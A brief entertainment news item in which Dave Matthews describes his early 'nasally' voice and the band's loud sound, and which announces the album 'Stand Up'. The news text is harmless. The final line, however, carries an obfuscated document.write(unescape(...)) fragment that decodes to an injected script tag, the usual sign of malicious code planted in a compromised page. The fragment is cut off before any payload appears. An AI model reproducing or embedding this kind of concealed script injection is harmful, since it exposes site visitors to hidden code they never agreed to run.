Has Dave Matthews' voice ever annoyed you? It's annoyed him. Matthews says he recently heard a recording he made about 15 years ago. He compares his voice then to the Lollipop Guild from "The Wizard of Oz." He says he had "a tiny, little, strange, nasally voice." Matthews says his vision of what the band would sound like in those days is nothing like it sounds now, although he's happy with how it turned out. Matthews says he had pictured them being quieter and hipper. Instead, he describes their sound as "incredibly aggressive, loud, country, hiccup mountain, rock, weird stuff."
The Dave Matthews Band have a new album out today, called "Stand Up."document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22